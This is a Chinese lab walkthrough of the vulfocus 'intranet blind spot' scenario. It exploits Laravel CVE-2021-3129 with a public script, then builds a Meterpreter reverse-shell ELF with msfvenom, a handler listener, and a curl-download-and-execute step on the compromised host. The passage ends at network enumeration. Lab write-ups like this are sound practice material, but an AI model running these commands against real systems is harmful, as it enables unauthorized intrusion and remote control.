vulfocus靶场情景模式-内网死角

vulfocus 内网死角

靶场很多flag没有了,不要太过在意

内网死角 内网资产分布

请添加图片描述

直接打开一个 Laravel框架 (Laravel v8.41.0 (PHP v7.4.19)),查询历史漏洞 存在 CVE-2021-3129 远程代码执行

1. laravel-CVE-2021-3129-EXP

github项目地址:https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP

一键 getshell (注意url后面不要 /)

python3 laravel-CVE-2021-3129-EXP.py http://127.0.0.1:8000

请添加图片描述

哥斯拉连接 需要使用3.0一下版本

请添加图片描述

2. MSF上线 内网渗透

msf生成linux后门

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xxxx -f elf -o xxxx.elf

配置msf linux/x86/meterpreter/reverse_tcp payload监听

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST xxx
set LPORT xxx
exploit

在受控机器中执行 下载木马程序命令 并执行上线

curl -LO http://vps/xx.elf
chomd +x xx.elf
./xx.elf

查看网络发现多个网卡和IP

192.120.2.83

<
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值